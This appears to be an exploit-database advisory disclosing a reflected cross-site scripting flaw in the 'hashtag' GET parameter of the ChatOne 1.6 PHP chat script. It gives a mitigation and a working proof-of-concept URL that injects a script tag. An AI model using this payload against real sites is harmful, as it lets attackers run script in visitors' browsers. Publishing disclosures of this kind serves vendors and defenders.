# Exploit Title: ChatOne 1.6 - 'hashtag' Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-08-16
# Exploit Author: Ali Alipour
# Vendor Homepage: https://codecanyon.net/item/chatone-social-networking-php-script/20737789
# Software Link Download : http://dl.20script.ir/script/chat/chatone[www.20script.ir].zip
# Version: 1.6
# Tested on: Kali Linux / Windows 10
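# Vulnerable Parameter Type: GET
# Vulnerable Parameter: hashtag (http://localhost/chat/hashtag?hashtag=[XSS])
# Description: The proof of concept indicates that the value of the 'hashtag' query parameter is written into the response page without HTML output encoding, so markup supplied in the URL is interpreted by the visitor's browser.
# Mitigation: HTML-encode the hashtag value at output (in PHP, htmlspecialchars() with ENT_QUOTES) and accept only the characters a hashtag can legitimately contain.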
# Proof of Concept:
[ chat/hashtag?hashtag='%22()%26%25<acx><ScRiPt%20>prompt('Ali Alipour')</ScRiPt> ]
http://localhost/chat/hashtag?hashtag='%22()%26%25<acx><ScRiPt%20>prompt('Ali Alipour')</ScRiPt>